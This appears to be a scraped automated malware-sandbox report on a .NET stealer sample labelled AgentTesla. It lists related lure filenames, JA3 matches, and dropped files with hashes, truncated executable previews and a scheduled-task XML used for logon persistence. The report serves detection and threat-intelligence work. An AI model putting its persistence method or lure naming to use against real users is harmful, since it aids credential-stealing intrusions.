                                      https://googleads.g.doubleclick.net/aclk?nis=4&sa=l&ai=CBy2nBWzuZebBCqaT9fwP3aiQyA_w2oDlddu5z5-iErOjjrWMDhABIPuchwNgpaCVgJgBoAH3paCUKsgBAqgDAcgDyQSqBK4CT9CEq8LQKNPdFDGXOtMpyjS3yMvP1hTqSeq0cEtWo62EIJdDfle1EjLt33lRwACMm2pw-rajkPdYwnT5Hl00cEmv9wBBsQioqExIWGvu6p-f1FgTA4lF99AYzAoZDqjOsgO1Aaf7zNmTuvPiNjPmB0lse0kqkk5ZW_51m-IllOWVbMnCztYUJcNx6Xyq6Uo5_4Le0urHHQPbXxiw_mda5IYUAcwGkwTL52V-4gywNNlNqOTkI7T9S7HMMTWKBFQXVzCHWUWNV3nKOVBWl4pQ82t3zIUfrU4C4jGcwqImfMmBkz7wuJEkik07BsxGcZ0EIPAjKv4S4TXrujRrzO55GTRkRsQnotspAHgJGD676hTPpQWOblgQN618COIhfqe2pEN3V0qQ1mCjVHv33q3ABNS0h5rvBIgFn4XMo06gBgKAB_fd8PMEqAfZtrECqAevvrECqAfVyRuoB6a-G6gHjs4bqAeT2BuoB-6WsQKoB_6esQKoB5oGqAfz0RuoB5bYG6gHqpuxAqgHg62xAqgH4L2xAqgH_56xAqgH35-xAqgHyqmxAqgH66WxAqgH6rGxAqgHmbWxAqgHvrexAtgHAdIILQiM4YBAEAEYHzIEi8KBDjoOj9CAgICADIDAgICAoChIvf3BOlj_u4e-lOuEA7EJaBWNCPNfR7iACgGYCwHICwHaDBEKCxDQlNaq1sWkyOIBEgIBA6oNAkFVyA0B2BMC0BUB-BYBgBcBshgJEgKCaBgCIgEA&ae=1&ase=2&gclid=EAIaIQobChMIptiHvpTrhAMVpkmdCR1dFAT5EAEYASAAEgJkAfD_BwE&num=1&cid=CAQSLQB7FLtqOsAeoITkk8_EfWxyFaX6LvfDD7qju4NO3pvtDST86esq5V2hobPA7hgB&sig=AOD64_3YUwGOAhvDgrtLKQSfZbxQDrMiug&client=ca-pub-3734677162347682&rf=2&nb=17&adurl=https://sites.google.com/view/fashionpassrent%3Fgclid%3DEAIaIQobChMIptiHvpTrhAMVpkmdCR1dFAT5EAEYASAAEgJkAfD_BwEGet hashmaliciousUnknownBrowse
                                      • 174.137.133.49

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0eBL-INVOICE SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 104.26.12.205
                                      CamScanner.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 104.26.12.205
                                      bhevLCQYD6.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.26.12.205
                                      TBC#01 Rev.A3 - lnexa.xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 104.26.12.205
                                      package80171530600.jpg.lnkGet hashmaliciousXWormBrowse
                                      • 104.26.12.205
                                      DHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 104.26.12.205
                                      inpau292101.jsGet hashmaliciousFormBookBrowse
                                      • 104.26.12.205
                                      SecuriteInfo.com.Win32.PWSX-gen.9732.1319.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 104.26.12.205
                                      ocrev ns.ordine 290520280324.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 104.26.12.205
                                      CANKO DMC IMPORT ENQUIRY.PDF.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 104.26.12.205

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeQuotation 1563050097.exeGet hashmaliciousAgentTeslaBrowse
                                        SOA 820527940511.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                          UpdateAdobe.exeGet hashmaliciousXWormBrowse
                                            INV.3175001503.exeGet hashmaliciousAgentTeslaBrowse
                                              Statement of Accounts.exeGet hashmaliciousAgentTeslaBrowse
                                                Invoice-AWB-Document.exeGet hashmaliciousXWormBrowse
                                                  Quotation 1563058092XXX.exeGet hashmaliciousAgentTeslaBrowse
                                                    h5fwH8gisX.exeGet hashmaliciousAgentTeslaBrowse
                                                      vJRoTmuNBS4S30j.exeGet hashmaliciousAgentTeslaBrowse
                                                        DHL-102113XXX.pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ECXXCuFHUVw.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oBMlky3Rkm7h5QK.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qZeUnR.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):142
                                                          Entropy (8bit):5.090621108356562
                                                          Encrypted:false
                                                          SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                          MD5:8C0458BB9EA02D50565175E38D577E35
                                                          SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                          SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                          SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2232
                                                          Entropy (8bit):5.379552885213346
                                                          Encrypted:false
                                                          SSDEEP:48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:fLHxvCsIfA2KRHmOugw1s
                                                          MD5:3E5712DC6AFCA8CF60C5CB8BE65E2089
                                                          SHA1:CDBAF3935912EFB05DBE58CA89C5422F07B528A0
                                                          SHA-256:B9F7E5F0AFD718D8585A8B37DD8C459ECDD4E7E68C5FE61631D89CDD3E229833
                                                          SHA-512:1BD81033EB26CD0EE3DEF6F02FECB4097D878D61CAA5BEF6739C51E889B99C9E695BECF51719959D33F7BA9838E202ADD7EE4DD704D5163B584F4E8B8B7ECC38
                                                          Malicious:false
                                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5byybizn.ydd.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3jirewm.svn.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mecfh0fm.v4x.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtmfindy.l3t.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwpr00un.32k.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwyglvgr.t1g.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybagexgq.sl0.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqqkgmgx.t25.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1598
                                                          Entropy (8bit):5.108301473724538
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLOPxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTSJv
                                                          MD5:F91E7CFCDEDAE8311AE4569A2CE8E45C
                                                          SHA1:A9B179C43BC2B26D2DABD38E059E318B9BDD7BF8
                                                          SHA-256:4217F6E3A94B5A98D3B8FD5187420E802A1586C9E05658397E5136F84A6E8AC3
                                                          SHA-512:6085C0406A5CD2F04F683EA91B2A1339AB997BD514EB9A63E2551EB876A83F27CFFB213A3994D0B1E8AF4B5CFC989B90E67C4A6EE21EE1D97077FCD4F94B0EE7
                                                          Malicious:true
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                                          C:\Users\user\AppData\Local\Temp\tmpF51D.tmp

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1598
                                                          Entropy (8bit):5.108301473724538
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLOPxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTSJv
                                                          MD5:F91E7CFCDEDAE8311AE4569A2CE8E45C
                                                          SHA1:A9B179C43BC2B26D2DABD38E059E318B9BDD7BF8
                                                          SHA-256:4217F6E3A94B5A98D3B8FD5187420E802A1586C9E05658397E5136F84A6E8AC3
                                                          SHA-512:6085C0406A5CD2F04F683EA91B2A1339AB997BD514EB9A63E2551EB876A83F27CFFB213A3994D0B1E8AF4B5CFC989B90E67C4A6EE21EE1D97077FCD4F94B0EE7
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                                          C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):761856
                                                          Entropy (8bit):7.652735134468148
                                                          Encrypted:false
                                                          SSDEEP:12288:akz4ayww0uLdzCeXEdFGpQCDsmIag2Sh7unpPcmg5I0i4DVlupWXAhT:UajazCe0dFoQQs55h7uVoG0dDVlup+
                                                          MD5:596365C750C4F8E60A966E220E35E7D9
                                                          SHA1:234B7114F19589E1768670361E2A4CD7328F8C75
                                                          SHA-256:E77C8CA31128A1A181B99A8234F39559854855D871D7ABE167E004BB970E7F3C
                                                          SHA-512:5679CC3BCA181E417DE60F4F8C473A17445405EB32F0E37855111BA5F6B8A95CC22225628DA8C0227078177342AD3F9A1B9C3B985E04AFF086D0A7E626E20047
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 68%
                                                          • Antivirus: Virustotal, Detection: 69%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A.................0.............z.... ........@.. ....................................@.................................%...O.......................................p............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................Y.......H.......|e...C..........`...8............................................0.............?......?...%.n...(.......?...%.r...(.......?...%.p...(.......?...%.o...(........?...%.q...(...............r...p(....-:..r...p(....-5..r...p(....-0..r...p(....-+..r...p(....-'+/.(...+.+&.(...+.+..(...+.+...(...+.+...(...+.+....+...*...0..,.......sg......}s........h...s....(...+..(...+.+..*.0..{........~)...o....}.....~*...}...........}.......?...}......}......}.....(.......(......(......(...

                                                          C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:false
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:modified
                                                          Size (bytes):45984
                                                          Entropy (8bit):6.16795797263964
                                                          Encrypted:false
                                                          SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                          MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                          SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                          SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                          SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Joe Sandbox View:
                                                          • Filename: Quotation 1563050097.exe, Detection: malicious, Browse
                                                          • Filename: SOA 820527940511.cmd.exe, Detection: malicious, Browse
                                                          • Filename: UpdateAdobe.exe, Detection: malicious, Browse
                                                          • Filename: INV.3175001503.exe, Detection: malicious, Browse
                                                          • Filename: Statement of Accounts.exe, Detection: malicious, Browse
                                                          • Filename: Invoice-AWB-Document.exe, Detection: malicious, Browse
                                                          • Filename: Quotation 1563058092XXX.exe, Detection: malicious, Browse
                                                          • Filename: h5fwH8gisX.exe, Detection: malicious, Browse
                                                          • Filename: vJRoTmuNBS4S30j.exe, Detection: malicious, Browse
                                                          • Filename: DHL-102113XXX.pdf.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                                          \Device\ConDrv

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1141
                                                          Entropy (8bit):4.442398121585593
                                                          Encrypted:false
                                                          SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                          MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                          SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                          SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                          SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                          Malicious:false
